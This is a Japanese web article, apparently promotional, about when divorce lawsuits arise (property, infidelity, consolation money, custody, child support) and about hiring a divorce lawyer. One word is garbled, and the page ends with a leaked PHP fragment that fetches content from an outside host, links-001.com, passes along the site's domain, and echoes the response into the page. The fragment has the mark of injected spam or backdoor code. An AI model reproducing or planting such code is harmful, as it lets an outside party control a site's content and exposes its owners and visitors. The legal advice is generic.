前へ
次へ

離婚裁判をするときには

離婚裁判というのは必ずしも離婚する時にやらなければならないというわけではないです。離婚自体は紙切れ一枚しっかりと出すことができるのであれば問題なくできるわけですが、当然様々な事で揉めることがあります。それは共有財産であったりどちらに非があるタイプの離婚であるのかということの決定とかそういう部分があります。基本的に両性の合意に基づいて行われていた行為というのが結婚であるわけですから例えば極端に相手に非がない場合において慰謝料とか損害賠償といったようなものは発生しないようにはなっています。ですが、貞操義務というのもあります。つまりは、浮気です。不倫などをしたことが理由で離婚の調停をお願いしているということになりますと当然浮気をした側に対して離婚を求めるということもできますし、その上で慰謝料の請求ということも可能になるわけです。それらを話し合いで済ませることができるのであれば離婚裁判なんてものをやる必要はないのですが、揉めることも多いです。養育費とか親権の問題なのもあるでしょうから、必ずしも浮気とか不倫などを理由に裁判をするというわけではなくどちらに親権を渡すのかとか養育費はいくらぐらいにするのか、ということなどがあるわけです。当然ですが裁判ということになりますのでん腰にお願いするということになるわけですがそのための費用というのが弁護士によってだいぶ変わってくるということもありますし、愛し合って結婚を誓って生活していた仲ではありますがいざは離婚するということになるのであれば少しでも自分の有利になるようにということで交渉してくれる弁護士を雇うというのは当然です。つまりは、離婚の弁護士と言うのを探すことです。離婚裁判に強いといわれている弁護士というのはいくらかいたりするのでそういうところにお願いするようにしましょう。費用はかかるでしょうが、色々な意味でこちら側に有利に進めるためには必要なことです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top